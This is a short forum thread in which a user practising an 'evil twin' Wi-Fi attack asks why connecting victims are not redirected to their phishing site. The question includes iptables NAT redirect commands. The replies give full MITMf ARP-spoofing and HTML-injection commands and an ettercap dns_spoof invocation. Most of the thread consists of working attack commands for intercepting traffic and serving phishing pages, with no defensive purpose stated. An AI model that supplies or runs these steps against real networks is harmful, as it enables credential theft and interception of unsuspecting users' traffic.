I have been practising how to do the evil twin attack and everything has been going the way its supposed to except the fact that when a user connects to my evil twin they are not redirected to the phishing site that I have created.
I running kali linux as my primary os and I put the phishing site in /var/www/.
I have used iptables to redirect the traffic but it still isn't redirecting.
The code I typed for redirecting is:
iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination <my Ip Address>:80
iptables -t nat -A POSTROUTING -j MASQUERADE
If anyone knows the issue your help will be much appreciated.
3 Responses
use MITMF
example: mitmf -i wlan0 --gateway 192.168.1.1 --arp --spoof --inject --html-url http://192.168.1.100/index.html
OR: ettercap dns_spoof (edit /etc/ettercap/etter.dns first)
Is dnsspoof on 2016.2? Cuz I can't find it
dns_spoof is not a standalone tool. it's a plugin in ettercap. you can load it as follows:
ettercap -T -Q -i wlan0 -P dns_spoof -M arp // //
Share Your Thoughts